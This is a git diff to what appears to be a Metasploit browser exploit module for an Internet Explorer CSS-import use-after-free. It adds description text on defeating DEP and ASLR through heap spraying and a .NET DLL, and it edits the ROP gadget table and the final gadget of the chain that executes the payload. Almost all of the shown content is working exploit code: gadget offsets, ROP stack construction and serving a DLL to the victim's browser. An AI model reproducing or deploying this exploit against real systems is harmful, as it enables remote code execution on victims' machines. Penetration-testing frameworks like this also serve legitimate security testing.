diff --git a/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb b/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb index b8a13c6a0b..47986ed1dc 100644 --- a/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb +++ b/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb @@ -33,6 +33,11 @@ class Metasploit3 < Msf::Exploit::Remote HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. + + This exploit utilizes a combination of heap spraying and the + .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not + opt-in to ASLR. As such, this module should be reliable on all Windows + versions. }, 'License' => MSF_LICENSE, 'Author' => @@ -288,6 +293,7 @@ EOS elsif request.uri =~ /\.dll$/ print_status("Sending #{self.refname} DLL to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...") + # Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually # use it's contents ... ibase = (0x2000 | rand(0x8000)) << 16 @@ -330,11 +336,7 @@ EOS 'xchg eax, esp / mov eax, [eax] / mov [esp], eax / ret' => 0x575b, 'leave / ret' => 0x25e5, 'ret' => 0x25e5+1, - 'mov eax, [eax] / ret' => 0x22a2, - 'mov [ecx], eax / xor eax, eax / pop esi / ret' => 0x360b9, - 'call [ecx] / pop ebp / ret 0xc' => 0x1ec4, - 'push eax / ret' => 0x1d1e4, 'pop eax / ret' => 0x5ba1, 'pop ebx / ret' => 0x54c0, 'pop ecx / ret' => 0x1e13, @@ -342,7 +344,6 @@ EOS 'pop edi / ret' => 0x2212, 'mov [ecx], eax / mov al, 1 / pop ebp / ret 0xc' => 0x61f6, 'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret' => 0x6154, - 'call [ecx]' => 0x1ec4 } end @@ -389,7 +390,7 @@ EOS rop_stack << 'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret' } # Execute the payload ;) - rop_stack << 'call [ecx]' + rop_stack << 'call [ecx] / pop ebp / ret 0xc' rop_stack.map! { |e| if e.kind_of? String